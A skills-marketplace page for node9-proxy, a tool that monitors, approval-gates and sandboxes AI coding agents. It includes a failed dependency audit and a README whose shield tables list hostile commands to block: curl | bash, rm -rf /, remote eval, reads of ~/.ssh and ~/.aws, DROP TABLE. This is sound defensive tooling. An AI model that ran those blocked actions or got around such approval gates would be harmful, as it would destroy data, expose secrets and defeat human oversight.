node9-proxy

Name: node9-proxy
Author: node9-ai

Issues

The Execution Security Layer for the Agentic Era. Providing deterministic "Sudo" governance and audit logs for autonomous AI agents.

206stars

18forks

TypeScript

Installation

# Add to your Claude Code skills
git clone https://github.com/node9-ai/node9-proxy

Getting Started

Guides for using ai agents skills like node9-proxy.

Caveman: Cut Claude Token Use by 65%
How agent-side prompt compression works, when to use it, and when not to.
What is an AI Skills Marketplace?
Definitions, how marketplaces work, and how to choose between them in 2026.
Getting Started with AI Skills

Security ReportIssues

Last scanned: 5/30/2026

{
  "issues": [
    {
      "type": "npm-audit",
      "message": "brace-expansion: brace-expansion: Zero-step sequence causes process hang and memory exhaustion",
      "severity": "medium"
    },
    {
      "type": "npm-audit",
      "message": "flatted: flatted vulnerable to unbounded recursion DoS in parse() revive phase",
      "severity": "high"
    },
    {
      "type": "npm-audit",
      "message": "handlebars: Handlebars.js has JavaScript Injection via AST Type Confusion by tampering @partial-block",
      "severity": "critical"
    },
    {
      "type": "npm-audit",
      "message": "ip-address: ip-address has XSS in Address6 HTML-emitting methods",
      "severity": "medium"
    },
    {
      "type": "npm-audit",
      "message": "lodash: lodash vulnerable to Code Injection via `_.template` imports key names",
      "severity": "high"
    },
    {
      "type": "npm-audit",
      "message": "lodash-es: lodash vulnerable to Code Injection via `_.template` imports key names",
      "severity": "high"
    },
    {
      "type": "npm-audit",
      "message": "minimatch: minimatch has ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments",
      "severity": "high"
    },
    {
      "type": "npm-audit",
      "message": "npm: Vulnerability found",
      "severity": "high"
    },
    {
      "type": "npm-audit",
      "message": "picomatch: Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching",
      "severity": "high"
    },
    {
      "type": "npm-audit",
      "message": "postcss: PostCSS has XSS via Unescaped </style> in its CSS Stringify Output",
      "severity": "medium"
    },
    {
      "type": "npm-audit",
      "message": "tar: tar has Hardlink Path Traversal via Drive-Relative Linkpath",
      "severity": "high"
    },
    {
      "type": "npm-audit",
      "message": "vite: Vite Vulnerable to Path Traversal in Optimized Deps `.map` Handling",
      "severity": "high"
    }
  ],
  "status": "FAILED",
  "scannedAt": "2026-05-30T15:42:52.070Z",
  "npmAuditRan": true,
  "pipAuditRan": true
}

README.md

Frequently Asked Questions

What is node9-proxy?

node9-proxy is an open-source ai agents skill for AI coding assistants such as Claude Code, Codex CLI, and ChatGPT, built by node9-ai. The Execution Security Layer for the Agentic Era. Providing deterministic "Sudo" governance and audit logs for autonomous AI agents. It has 206 GitHub stars.

Is node9-proxy safe to use?

node9-proxy failed SkillsLLM's automated security scan, which flagged one or more high-severity issues. Review the Security Report section carefully before using it.

How do I install node9-proxy?

Clone the repository with "git clone https://github.com/node9-ai/node9-proxy" and add it to your Claude Code skills directory (see the Installation section above).

What programming language is node9-proxy written in?

node9-proxy is primarily written in TypeScript. It is open-source under node9-ai on GitHub, so you can review or fork the full source.

Are there alternatives to node9-proxy?

Yes. SkillsLLM lists many other AI Agents skills you can browse and compare side by side. Open the AI Agents category from the badge at the top of this page, or use the Related Skills and comparison links further down to weigh node9-proxy against similar tools.

Agentic AI for Beginners

Build your first AI agent from scratch - tool use, ReAct pattern, memory, deployment

41 minBeginner

Comments (0)

to leave a comment.

No comments yet. Be the first to share your thoughts!

Related Skills

superpowers

by obra

An agentic skills framework & software development methodology that works.

234,966

maestro opsy

Node9 sits between your AI agent and the tools it can use — discover what it's already been doing, protect against risky actions in real time, and review what happened over any time window.

Works with Claude Code · Codex CLI · Antigravity (agy) · GitHub Copilot CLI · Gemini CLI · Cursor · Windsurf · VSCode · Claude Desktop · Opencode · Pi · Hermes Agent · any MCP server.

What Node9 does

🔍 Discover — scan every past AI session for credential leaks, agent loops, blocked operations, and every secret on disk an agent could reach right now
🛡 Protect — review or block risky commands before they run — rm -rf, git push --force, DROP TABLE, credential reads, curl | bash, AWS/GitHub/Stripe key leaks
📊 Review — period-windowed report (today / week / month / 90 days) — cost per agent, top tools, shields fired, blast radius

Retrospective scan

This is my own machine — 90 days while building Node9. Score 25/100, 5 credential files an AI agent could reach right now.

npx node9-ai scan   # before installation, runs in ~10s, nothing uploads
node9 scan          # after installation, same output

Security posture scorecard

node9 posture grades how exposed this machine is to a compromised agent — isolation, egress, secrets on disk, supply chain, privilege — and hands you the exact command to fix each finding.

node9 posture          # scorecard with the #1 risk and a fix for every finding
node9 posture --ship   # send a redacted snapshot to your node9 dashboard (fleet view)

Findings are grouped by who can fix them: 🔒 the ones node9 reduces (just run the command) and 🧱 the ones only you can. Each carries a plain-language what / why / who and a real remediation — e.g. the "agent runs unsandboxed on the host" finding points straight at node9 sandbox run (below).

🛡️  Node9 Posture — agent on this host        Score: 100/100  (Good)
  2 advisories below don't affect the score — OS-level exposure, yours to weigh.

  🟢 node9 is already protecting you
  ✅ Secrets        node9 DLP is blocking this
  ✅ Egress         node9 egress is approval-gating this
  ✅ Approval gate  node9 is blocking this
  ✅ Privilege      node9 is approval-gating this

  🔒 node9 reduces these — run the command, the rest is yours
  ⚠️  Isolation     Running directly on the host — no container
                   The agent runs loose on your whole machine, not in a sandbox.
                   → node9 sandbox run <agent>   — jail it: kernel egress + scoped mounts + node9 inside
                   → node9 shield enable project-jail   — or shrink the blast radius, keep host access
  ⚠️  Network exposure  4 services on 0.0.0.0 (node :3000/:4000, PostgreSQL :5432, Redis :6379)
                   Reachable from your whole network, not just this laptop.
                   → node9 shield enable postgres|redis   — node9 blocks DROP TABLE / FLUSHALL
                   → bind to 127.0.0.1 / firewall the port   (your part)

  ✅ Supply chain   no issues found
  ✅ Coverage       no issues found

  Track this across your fleet & keep it green → node9.ai

Live monitoring

node9 monitor opens an interactive terminal dashboard with two views:

[1] Realtime — live activity, approvals, security alerts, current risk score
[2] Report — period-windowed summary: cost, top tools, shields fired, blast radius

Report

Press [2] in monitor for a period-windowed summary. Toggle the window with [T]oday · [W]eek · [M]onth · [N]inety — same panels as the scan above, driven by your post-install audit log.

node9 monitor              # press [2] for Report view
node9 report --period 7d   # CLI form, no TUI

Install

# macOS / Linux
brew tap node9-ai/node9 && brew install node9

# or via npm (any platform)
npm install -g node9-ai

node9 init       # auto-wires all detected agents + MCP servers
node9 doctor     # verify everything is wired correctly

Requires Node.js 18+.

Shields — curated rule packs

Each shield is a curated rule set for a service or domain. Enable only what you need.

Shield	What it catches	Enable
`project-jail`	Blocks reads of `~/.ssh`, `~/.aws`, `.env`, credentials via Bash and Read tool	`node9 shield enable project-jail`
`bash-safe`	`curl \| bash`, `rm -rf /`, disk overwrite, `eval` of remote	`node9 shield enable bash-safe`
`postgres`	`DROP TABLE`, `TRUNCATE`, `DROP COLUMN`, `DELETE` without `WHERE`	`node9 shield enable postgres`
`mongodb`	`dropDatabase`, `drop()`, `deleteMany({})`, index drops	`node9 shield enable mongodb`
`redis`	`FLUSHALL`, `FLUSHDB`, `CONFIG SET` on a live server	`node9 shield enable redis`
`aws`	S3 delete, EC2 terminate, IAM changes, RDS destroy	`node9 shield enable aws`
`k8s`	namespace delete, `helm uninstall`, cluster role wipes	`node9 shield enable k8s`
`docker`	`system prune`, `volume prune`, `rm -f` containers	`node9 shield enable docker`
`github`	`gh repo delete`, remote branch deletion, settings changes	`node9 shield enable github`
`filesystem`	`chmod 777`, writes under `/etc/`, `/boot/`, `/usr/`	`node9 shield enable filesystem`
`mcp-tool-gating`	unapproved MCP tools silently activating new capabilities	`node9 shield enable mcp-tool-gating`

node9 shield list    # show all shields + status

Always on — no config needed

Git — catches git push --force, git reset --hard, git clean -fd
SQL — catches DELETE / UPDATE without WHERE, DROP TABLE, TRUNCATE
Shell — catches curl | bash, unauthorized sudo
DLP — flags AWS keys, GitHub tokens, Stripe keys, PEM private keys in any tool argument, file contents, or shell config (~/.zshrc, ~/.bashrc)
Response DLP — background scanner reads Claude's conversation history and alerts you if Claude wrote a secret in its response text
Auto-undo — git snapshot before every AI file edit → node9 undo to revert
Skills pinning — SHA-256 verification of installed Claude skills / plugins between sessions

Review prompts — approve inline, in your agent

When node9 flags an action for review (e.g. git push --force, a DROP TABLE), the approve/deny prompt renders inline in the agent conversation — no frozen session, no separate terminal, no hook-timeout race. node9 still runs the full evaluator and makes the decision; only the prompt surface moves to the agent.

On by default for Claude Code and GitHub Copilot CLI — the agents whose hook contract honors a native ask. Every other agent (Codex, Gemini, Antigravity, Hermes, Cursor, OpenCode, Pi) uses node9's own approver.
Control it with reviewChannel in ~/.node9/config.json (or --no-ask on the hook):

{
  "settings": {
    "reviewChannel": "ask", // "ask" = inline agent prompt (default) | "approver" = node9's own approver
  },
}

Team setups: when a cloud/team approver is configured (approvers.cloud: true), reviews route to that approver instead — node9 won't let an inline self-approval bypass routed/second-party approval.

Sandbox — run an agent in a jail

When watching isn't enough, node9 sandbox runs the agent inside a disposable container with a kernel-enforced egress allowlist and scoped mounts — while node9's hooks govern and audit every tool call inside the box. The hard version of protection: the agent can only touch the folder you mount and reach the hosts you allow; everything else is dropped at the kernel.

cd ~/my-project
node9 sandbox new        # write node9.sandbox.yaml — what to mount + which hosts to allow
node9 sandbox run        # build + boot the jailed agent (your project at /workspace)
node9 sandbox tail       # watch the agent's actions live, from the host

Disposable — the container is destroyed on exit; your project edits land on y